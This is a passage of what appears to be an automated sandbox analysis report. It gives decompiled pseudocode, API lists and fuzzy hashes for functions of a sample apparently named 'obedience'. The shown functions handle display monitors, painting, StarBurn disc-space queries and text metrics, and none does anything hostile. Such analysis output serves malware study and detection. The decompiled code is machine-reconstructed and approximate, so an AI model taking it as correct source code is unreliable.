				struct tagRECT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x490933 != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x490920 = E0042D52C(7, _t60, "EnumDisplayMonitors",  *0x490920, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}














      0x0042daed
      0x0042daf0
      0x0042dafa
      0x0042db2a
      0x0042db30
      0x0042dbec
      0x0042dbf4
      0x0042dbf4
      0x0042db38
      0x0042db3d
      0x0042db48
      0x0042db53
      0x0042db58
      0x0042dbc1
      0x0042dbd9
      0x0042dbea
      0x0042dbd5
      0x0042dbd5
      0x0042dbd5
      0x00000000
      0x0042dbc1
      0x0042db64
      0x0042db73
      0x00000000
      0x00000000
      0x0042db85
      0x0042db9d
      0x0042dbb3
      0x00000000
      0x00000000
      0x0042dbb9
      0x0042dbbb
      0x0042dbbb
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x0042db9d
      0x0042db0e
      0x0042db23
      0x00000000

      APIs
      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042DB1D
      • GetSystemMetrics.USER32 ref: 0042DB42
      • GetSystemMetrics.USER32 ref: 0042DB4D
      • GetClipBox.GDI32(?,?), ref: 0042DB5F
      • GetDCOrgEx.GDI32(?,?), ref: 0042DB6C
      • OffsetRect.USER32(?,?,?), ref: 0042DB85
      • IntersectRect.USER32 ref: 0042DB96
      • IntersectRect.USER32 ref: 0042DBAC
        • Part of subcall function 0042D52C: GetProcAddress.KERNEL32(75BA0000,00000000), ref: 0042D5B0
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
      • String ID: EnumDisplayMonitors
      • API String ID: 362875416-2491903729
      • Opcode ID: 4fff6a5c103f961ff8e09f8f75a3db9a6acba56e747655328087e9e2bb768a2b
      • Instruction ID: 750d737732ca315eb021a3dc7bb8c0d53296e30f3f071cdfa3576e0cb3f45ca9
      • Opcode Fuzzy Hash: 4fff6a5c103f961ff8e09f8f75a3db9a6acba56e747655328087e9e2bb768a2b
      • Instruction Fuzzy Hash: 64312DB2E04219AFDB11DFA5DC44AEF77BCAB49301F414127E915E3241E738A901CBA9
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004492C0 Relevance: 16.6, APIs: 11, Instructions: 133COMMON
      Download Yara Rule
      C-Code - Quality: 83%
      			E004492C0(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				void* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				intOrPtr _v84;
				void* _v96;
				struct HDC__* _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t47;
				struct HDC__* _t55;
				intOrPtr* _t83;
				intOrPtr _t102;
				void* _t103;
				void* _t108;
				void* _t111;
				void* _t113;
				intOrPtr _t114;

				_t111 = _t113;
				_t114 = _t113 + 0xffffff94;
				_push(_t103);
				_t108 = __edx;
				_t83 = __eax;
				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E00447E60(_t83) != 0) {
						_t38 = E00448DE4(_t83, _t83, _t108, _t103, _t108);
					} else {
						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
					}
					return _t38;
				} else {
					L00407658();
					 *((intOrPtr*)( *__eax + 0x44))();
					 *((intOrPtr*)( *__eax + 0x44))();
					_t47 = _v104;
					L00407278();
					_v12 = _t47;
					L004078C0();
					L00407280();
					_v8 = _t47;
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t114;
					_t55 = BeginPaint(E0044B158(_t83),  &_v80);
					E00445AE8(_t83, _v8, 0x14, _v8);
					 *((intOrPtr*)(_t108 + 4)) = _v8;
					E004492C0(_t83, _t108);
					 *((intOrPtr*)(_t108 + 4)) = 0;
					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x449412, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
					_push(_v104);
					_push(0);
					_push(0);
					L00407258();
					EndPaint(E0044B158(_t83),  &_v80);
					_t102 = _t55;
					 *[fs:eax] = _t102;
					_push(0x449419);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
					return DeleteObject(_v12);
				}
			}

























      0x004492c1
      0x004492c3
      0x004492c8
      0x004492c9
      0x004492cb
      0x004492d4
      0x004492e0
      0x004492ff
      0x004492ed
      0x004492f3
      0x004492f3
      0x0044941f
      0x00449309
      0x0044930b
      0x00449319
      0x00449327
      0x0044932a
      0x0044932f
      0x00449334
      0x0044933a
      0x00449341
      0x00449346
      0x00449356
      0x00449364
      0x00449373
      0x00449388
      0x00449390
      0x00449397
      0x0044939e
      0x004493b5
      0x004493c3
      0x004493c9
      0x004493ca
      0x004493cc
      0x004493cf
      0x004493e0
      0x004493e7
      0x004493ea
      0x004493ed
      0x004493fa
      0x00449403
      0x00449411
      0x00449411

      APIs
      • 73BEAC50.USER32(00000000), ref: 0044930B
      • 73BEA520.GDI32(00000000,?), ref: 0044932F
      • 73BEB380.USER32(00000000,00000000,00000000,?), ref: 0044933A
      • 73BEA590.GDI32(00000000,00000000,00000000,00000000,?), ref: 00449341
      • SelectObject.GDI32(?,?), ref: 00449351
      • BeginPaint.USER32(00000000,?,00000000,00449412,?,?,?,00000000,00000000,00000000,00000000,?), ref: 00449373
      • 73BF97E0.GDI32(00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00000000,?), ref: 004493CF
      • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00000000,?), ref: 004493E0
      • SelectObject.GDI32(?,?), ref: 004493FA
      • DeleteDC.GDI32(?), ref: 00449403
      • DeleteObject.GDI32(?), ref: 0044940C
        • Part of subcall function 00448DE4: BeginPaint.USER32(00000000,?), ref: 00448E0A
        • Part of subcall function 00448DE4: EndPaint.USER32(00000000,?,00448F0B), ref: 00448EFE
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Paint$Object$BeginDeleteSelect$A520A590B380
      • String ID:
      • API String ID: 2363126454-0
      • Opcode ID: 4592e54644e2acaf5eedcabcda8808abf402a514375308b7dc00a3075179b67d
      • Instruction ID: 582b59201a8b2163b2cf0d8b0032f4884ff28defebcfc6aa787f3df1994e5ca7
      • Opcode Fuzzy Hash: 4592e54644e2acaf5eedcabcda8808abf402a514375308b7dc00a3075179b67d
      • Instruction Fuzzy Hash: 2D414C71B04204AFDB00EBE9CD85B9EB7F8AB49304F1044BAF509EB281DA78ED059B55
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00486828 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 204COMMON
      Download Yara Rule
      C-Code - Quality: 57%
      			E00486828(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v90;
				char _v1114;
				char _v1120;
				char* _v1124;
				char _v1128;
				char _v1132;
				char _v1136;
				char _v1140;
				char _v1144;
				char _v1148;
				char* _t95;
				char _t98;
				char _t103;
				intOrPtr* _t122;
				intOrPtr* _t130;
				intOrPtr* _t140;
				char* _t150;
				intOrPtr* _t158;
				intOrPtr* _t194;
				void* _t197;
				void* _t199;

				_t206 = __fp0;
				_t192 = __edi;
				_v36 = 0;
				_t194 = __ecx;
				_push(_t197);
				_push(0x486ad7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t197 + 0xfffffb88;
				E00466988(__ecx);
				_v28 = 0;
				_v32 = 0x1f;
				E00407A30();
				_t199 =  *((intOrPtr*)(__edx + 0x2c)) - 1;
				if(_t199 < 0) {
					_push(1);
					_push(E00404F00( *((intOrPtr*)(__edx + 0x28))));
					_push(0);
					_push(0);
					_push( &_v90);
					_push( &_v32);
					_push(0x400);
					_push( &_v1114);
					_t95 =  &_v28;
					_push(_t95);
					L00465E04();
					_t164 = _t95;
					if(_t95 != 0) {
						_v1140 = 0;
						_v1136 = 0;
						_v1132 = _v32;
						_v1128 = 0;
						_v1124 =  &_v1114;
						_v1120 = 6;
						E0040A164("StarBurn_CdvdBurnerGrabber_CreateEx() failed, exception %d, status %d, text \"%s\"", 2,  &_v1140,  &_v36);
						_t140 =  *0x48f538; // 0x490c50
						E0047FD7C( *_t140, _t164, 0, _v36, __edi, _t194, __fp0);
					}
				} else {
					if(_t199 == 0) {
						_push(1);
						_push( *((intOrPtr*)(__edx + 0x24)));
						_push( *((intOrPtr*)(__edx + 0x23)));
						_push( *((intOrPtr*)(__edx + 0x22)));
						_push( *((intOrPtr*)(__edx + 0x21)));
						_push(0);
						_push(0);
						_push( &_v90);
						_push( &_v32);
						_push(0x400);
						_push( &_v1114);
						_t150 =  &_v28;
						_push(_t150);
						L00465DFC();
						_t167 = _t150;
						if(_t150 != 0) {
							_v1140 = 0;
							_v1136 = 0;
							_v1132 = _v32;
							_v1128 = 0;
							_v1124 =  &_v1114;
							_v1120 = 6;
							E0040A164("StarBurn_CdvdBurnerGrabber_Create() failed, exception %d, status %d, text \"%s\"", 2,  &_v1140,  &_v36);
							_t158 =  *0x48f538; // 0x490c50
							E0047FD7C( *_t158, _t167, 0, _v36, __edi, _t194, __fp0);
						}
					}
				}
				_push( &_v12);
				_push( &_v24);
				_push(3);
				_t98 = _v28;
				_push(_t98);
				L00465F2C();
				_t165 = _t98;
				if(_t98 != 0) {
					_v1148 = 0;
					_v1144 = 0;
					E0040A164("StarBurn_CdvdBurnerGrabber_GetDiscFreeSpace() failed, exception %d\"", 0,  &_v1148,  &_v36);
					_t130 =  *0x48f538; // 0x490c50
					E0047FD7C( *_t130, _t165, 0, _v36, _t192, _t194, _t206);
				}
				_push( &_v20);
				_push( &_v90);
				_push( &_v32);
				_push(0x400);
				_push( &_v1114);
				_t103 = _v28;
				_push(_t103);
				L00465F34();
				_t166 = _t103;
				if(_t103 != 0) {
					_v1140 = 0;
					_v1136 = 0;
					_v1132 = _v32;
					_v1128 = 0;
					_v1124 =  &_v1114;
					_v1120 = 6;
					E0040A164("StarBurn_CdvdBurnerGrabber_GetDiscUsedSpace() failed, exception %d, status %d, text \"%s\"", 2,  &_v1140,  &_v36);
					_t122 =  *0x48f538; // 0x490c50
					E0047FD7C( *_t122, _t166, 0, _v36, _t192, _t194, _t206);
				}
				asm("adc edx, [ebp-0x4]");
				 *((intOrPtr*)(_t194 + 8)) = _v20 + _v12;
				 *((intOrPtr*)(_t194 + 0xc)) = _v16;
				 *_t194 = _v12;
				 *((intOrPtr*)(_t194 + 4)) = _v8;
				 *((intOrPtr*)(_t194 + 0x10)) = _v20;
				 *((intOrPtr*)(_t194 + 0x14)) = _v16;
				 *((intOrPtr*)(_t194 + 0x18)) = _v24;
				 *((intOrPtr*)(_t194 + 0x1c)) = 0;
				_push( &_v28);
				L00465DCC();
				 *[fs:eax] = 0;
				_push(0x486ade);
				return E00404A40( &_v36);
			}
































      0x00486828
      0x00486828
      0x00486835
      0x00486838
      0x0048683e
      0x0048683f
      0x00486844
      0x00486847
      0x0048684c
      0x00486853
      0x00486856
      0x00486868
      0x00486870
      0x00486872
      0x0048691e
      0x00486928
      0x00486929
      0x0048692b
      0x00486930
      0x00486934
      0x00486935
      0x00486940
      0x00486941
      0x00486944
      0x00486945
      0x0048694a
      0x0048694e
      0x00486958
      0x0048695e
      0x00486968
      0x0048696e
      0x0048697b
      0x00486981
      0x00486998
      0x0048699d
      0x004869a9
      0x004869a9
      0x00486878
      0x00486878
      0x0048687e
      0x00486883
      0x00486887
      0x0048688b
      0x0048688f
      0x00486890
      0x00486892
      0x00486897
      0x0048689b
      0x0048689c
      0x004868a7
      0x004868a8
      0x004868ab
      0x004868ac
      0x004868b1
      0x004868b5
      0x004868c3
      0x004868c9
      0x004868d3
      0x004868d9
      0x004868e6
      0x004868ec
      0x00486903
      0x00486908
      0x00486914
      0x00486914
      0x004868b5
      0x00486878
      0x004869b1
      0x004869b5
      0x004869b6
      0x004869b8
      0x004869bb
      0x004869bc
      0x004869c1
      0x004869c5
      0x004869cf
      0x004869d5
      0x004869e9
      0x004869ee
      0x004869fa
      0x004869fa
      0x00486a02
      0x00486a06
      0x00486a0a
      0x00486a0b
      0x00486a16
      0x00486a17
      0x00486a1a
      0x00486a1b
      0x00486a20
      0x00486a24
      0x00486a2e
      0x00486a34
      0x00486a3e
      0x00486a44
      0x00486a51
      0x00486a57
      0x00486a6e
      0x00486a73
      0x00486a7f
      0x00486a7f
      0x00486a8d
      0x00486a90
      0x00486a93
      0x00486a99
      0x00486a9e
      0x00486aa4
      0x00486aaa
      0x00486ab2
      0x00486ab5
      0x00486abb
      0x00486abc
      0x00486ac6
      0x00486ac9
      0x00486ad6

      APIs
      • StarBurn_CdvdBurnerGrabber_Create.STARBURN(00000000,?,00000400,0000001F,?,00000000,00000000,?,?,?,?,00000001,00000000,00486AD7,?,00000000), ref: 004868AC
      • StarBurn_CdvdBurnerGrabber_CreateEx.STARBURN(00000000,?,00000400,0000001F,?,00000000,00000000,00000000,00000001,00000000,00486AD7,?,00000000,00000000,?,0048666E), ref: 00486945
      • StarBurn_CdvdBurnerGrabber_GetDiscFreeSpace.STARBURN(00000000,00000003,00486817,?,00000000,?,00000400,0000001F,?,00000000,00000000,00000000,00000001,00000000,00486AD7), ref: 004869BC
      • StarBurn_CdvdBurnerGrabber_GetDiscUsedSpace.STARBURN(00000000,?,00000400,0000001F,?,?,00000000,00000003,00486817,?,00000000,?,00000400,0000001F,?,00000000), ref: 00486A1B
      • StarBurn_Destroy.STARBURN(00000000,00000000,?,00000400,0000001F,?,?,00000000,00000003,00486817,?,00000000,?,00000400,0000001F,?), ref: 00486ABC
      Strings
      • StarBurn_CdvdBurnerGrabber_CreateEx() failed, exception %d, status %d, text "%s", xrefs: 00486993
      • StarBurn_CdvdBurnerGrabber_Create() failed, exception %d, status %d, text "%s", xrefs: 004868FE
      • StarBurn_CdvdBurnerGrabber_GetDiscFreeSpace() failed, exception %d", xrefs: 004869E4
      • StarBurn_CdvdBurnerGrabber_GetDiscUsedSpace() failed, exception %d, status %d, text "%s", xrefs: 00486A69
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_Star$BurnerCdvdGrabber_$CreateDiscSpace$DestroyFreeUsed
      • String ID: StarBurn_CdvdBurnerGrabber_Create() failed, exception %d, status %d, text "%s"$StarBurn_CdvdBurnerGrabber_CreateEx() failed, exception %d, status %d, text "%s"$StarBurn_CdvdBurnerGrabber_GetDiscFreeSpace() failed, exception %d"$StarBurn_CdvdBurnerGrabber_GetDiscUsedSpace() failed, exception %d, status %d, text "%s"
      • API String ID: 3564614495-1107877878
      • Opcode ID: 23b72e9c19ea2c3d3fc916a55a66ead6a3f51f599b61974f7a2f60ec4a970180
      • Instruction ID: 265146b734a54c9b6d9e56ebca5357c0f8eba9cffe2afc1905ca3030d266ebcb
      • Opcode Fuzzy Hash: 23b72e9c19ea2c3d3fc916a55a66ead6a3f51f599b61974f7a2f60ec4a970180
      • Instruction Fuzzy Hash: 248167B19042589FCB50DFA8CC81BDEB7F8AB0D304F4145AAE648E7341E774AA45CF69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0047261C Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 121windowCOMMON
      Download Yara Rule
      C-Code - Quality: 76%
      			E0047261C(void* __eax, void* __ebx, char __ecx, int __edx, void* __edi, void* __esi) {
				char _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				long _t53;
				long _t68;
				void* _t73;
				intOrPtr _t77;
				void* _t84;
				intOrPtr _t92;
				void* _t95;
				long _t100;
				long _t101;
				int _t103;
				void* _t107;

				_v40 = 0;
				_v36 = 0;
				_v24 = 0;
				_v8 = __ecx;
				_t103 = __edx;
				_t84 = __eax;
				_push(_t107);
				_push(0x47278b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t107 + 0xffffffdc;
				if(__edx < 0) {
					L8:
					_pop(_t92);
					 *[fs:eax] = _t92;
					_push(0x472792);
					E00404A64( &_v40, 2);
					return E00404A40( &_v24);
				}
				_t100 = SendMessageA(E0044B158( *((intOrPtr*)(__eax + 0x10))), 0xbb, __edx, 0);
				_v16 = _t100;
				if(_t100 < 0) {
					_t101 = SendMessageA(E0044B158( *((intOrPtr*)(_t84 + 0x10))), 0xbb, _t103 - 1, 0);
					_v16 = _t101;
					if(_t101 < 0) {
						goto L8;
					}
					_t53 = SendMessageA(E0044B158( *((intOrPtr*)(_t84 + 0x10))), 0xc1, _v16, 0);
					if(_t53 == 0) {
						goto L8;
					}
					_v16 = _v16 + _t53;
					_v20 = 0x4727a4;
					L6:
					_v12 = _v16;
					SendMessageA(E0044B158( *((intOrPtr*)(_t84 + 0x10))), 0x437, 0,  &_v16);
					_push( &_v24);
					_v32 = _v8;
					_v28 = 0xb;
					_push( &_v32);
					E00404C38( &_v36, _v20);
					_pop(_t95);
					E0040A164(_v36, 0, _t95);
					_t68 = E00404F00(_v24);
					SendMessageA(E0044B158( *((intOrPtr*)(_t84 + 0x10))), 0xc2, 0, _t68);
					_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x10)))) + 0xd0))();
					if(_t73 != E00404D00(_v24) + _v12) {
						_t77 =  *0x48f5d4; // 0x466c60
						E00406A3C(_t77, 0,  &_v40);
						E0040CBEC(_v40, 1);
						E004043D0();
					}
					goto L8;
				}
				_v20 = 0x47279c;
				goto L6;
			}























      0x00472627
      0x0047262a
      0x0047262d
      0x00472630
      0x00472633
      0x00472635
      0x00472639
      0x0047263a
      0x0047263f
      0x00472642
      0x00472647
      0x00472768
      0x0047276a
      0x0047276d
      0x00472770
      0x0047277d
      0x0047278a
      0x0047278a
      0x00472663
      0x00472665
      0x0047266a
      0x0047268d
      0x0047268f
      0x00472694
      0x00000000
      0x00000000
      0x004726ae
      0x004726b5
      0x00000000
      0x00000000
      0x004726bb
      0x004726c3
      0x004726c6
      0x004726c9
      0x004726e0
      0x004726e8
      0x004726ec
      0x004726ef
      0x004726f6
      0x004726fd
      0x00472707
      0x00472708
      0x00472710
      0x00472726
      0x00472730
      0x00472745
      0x0047274a
      0x0047274f
      0x0047275e
      0x00472763
      0x00472763
      0x00000000
      0x00472745
      0x00472671
      0x00000000

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MessageSend
      • String ID: %s$%s$TsA$`lF
      • API String ID: 3850602802-2232998534
      • Opcode ID: 80e501cdaa155126c5a42cdd37b0a9bc861f6f5d2c7376ef2480ad07d51763e2
      • Instruction ID: e9705ed051abbdcae2fe669036359d053de33943c29310b41a64220534562838
      • Opcode Fuzzy Hash: 80e501cdaa155126c5a42cdd37b0a9bc861f6f5d2c7376ef2480ad07d51763e2
      • Instruction Fuzzy Hash: 7E412E71A40304ABDB04EFA5C986A9EB7F8EF48704F50847AF914F7281D7799D04CB68
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00435B98 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63COMMON
      Download Yara Rule
      C-Code - Quality: 86%
      			E00435B98(struct HDC__* __eax, void* __edx, void* __ebp, void* __eflags) {
				struct tagTEXTMETRICA _v112;
				void* __ebx;
				void* _t14;
				char* _t18;
				signed int _t19;
				signed int _t21;
				struct HDC__* _t27;
				signed int _t28;
				signed int _t30;
				signed int _t31;
				void* _t32;
				struct HDC__* _t38;
				struct tagTEXTMETRICA* _t40;

				_t40 =  &_v112;
				_t38 = __eax;
				_push(0);
				L00407658();
				_t27 = __eax;
				GetTextMetricsA(__eax, _t40);
				_t14 = SelectObject(_t27, E00425B40( *((intOrPtr*)(_t38 + 0x68)), _t27, _t32));
				GetTextMetricsA(_t27,  &(_v112.tmMaxCharWidth));
				SelectObject(_t27, _t14);
				_push(_t27);
				_push(0);
				L004078C0();
				_t18 =  *0x48f73c; // 0x490ae0
				if( *_t18 == 0) {
					_t28 = _t40->tmHeight;
					_t19 = _v112.tmHeight;
					if(_t28 > _t19) {
						_t28 = _t19;
					}
					_t21 = GetSystemMetrics(6) << 2;
					if(_t28 < 0) {
						_t28 = _t28 + 3;
					}
					_t30 = _t21 + (_t28 >> 2);
				} else {
					if( *((char*)(_t38 + 0x1a5)) == 0) {
						_t31 = 6;
					} else {
						_t31 = 8;
					}
					_t30 = GetSystemMetrics(6) * _t31;
				}
				return E00444108(_t38, _v112 + _t30);
			}
















      0x00435b9b
      0x00435b9e
      0x00435ba0
      0x00435ba2
      0x00435ba7
      0x00435bab
      0x00435bba
      0x00435bc7
      0x00435bce
      0x00435bd3
      0x00435bd4
      0x00435bd6
      0x00435bdb
      0x00435be3
      0x00435c07
      0x00435c0a
      0x00435c10
      0x00435c12
      0x00435c12
      0x00435c1b
      0x00435c20
      0x00435c22
      0x00435c22
      0x00435c2a
      0x00435be5
      0x00435bec
      0x00435bf5
      0x00435bee
      0x00435bee
      0x00435bee
      0x00435c03
      0x00435c03
      0x00435c3f

      APIs
      • 73BEAC50.USER32(00000000), ref: 00435BA2
      • GetTextMetricsA.GDI32(00000000), ref: 00435BAB
        • Part of subcall function 00425B40: CreateFontIndirectA.GDI32(?), ref: 00425C7E
      • SelectObject.GDI32(00000000,00000000), ref: 00435BBA
      • GetTextMetricsA.GDI32(00000000,?), ref: 00435BC7
      • SelectObject.GDI32(00000000,00000000), ref: 00435BCE
      • 73BEB380.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00435BD6
      • GetSystemMetrics.USER32 ref: 00435BFC
      • GetSystemMetrics.USER32 ref: 00435C16
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Metrics$ObjectSelectSystemText$B380CreateFontIndirect
      • String ID: I
      • API String ID: 3751190600-299795746
      • Opcode ID: 65fddf76fe1d530042e72f51a6e4043cd0982eb9141ee8f03b627142d75ec0ea
      • Instruction ID: 8bcf32d755c3cae5c9eeffff763e8598d868f39fad12eae2dc07d2a72970266d
      • Opcode Fuzzy Hash: 65fddf76fe1d530042e72f51a6e4043cd0982eb9141ee8f03b627142d75ec0ea
      • Instruction Fuzzy Hash: CA115661B087406BE310767ACCC2B6B66C89B59398F44293AB646DB3D2D56DAC40836A
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00448F3C Relevance: 15.2, APIs: 10, Instructions: 177windowCOMMON
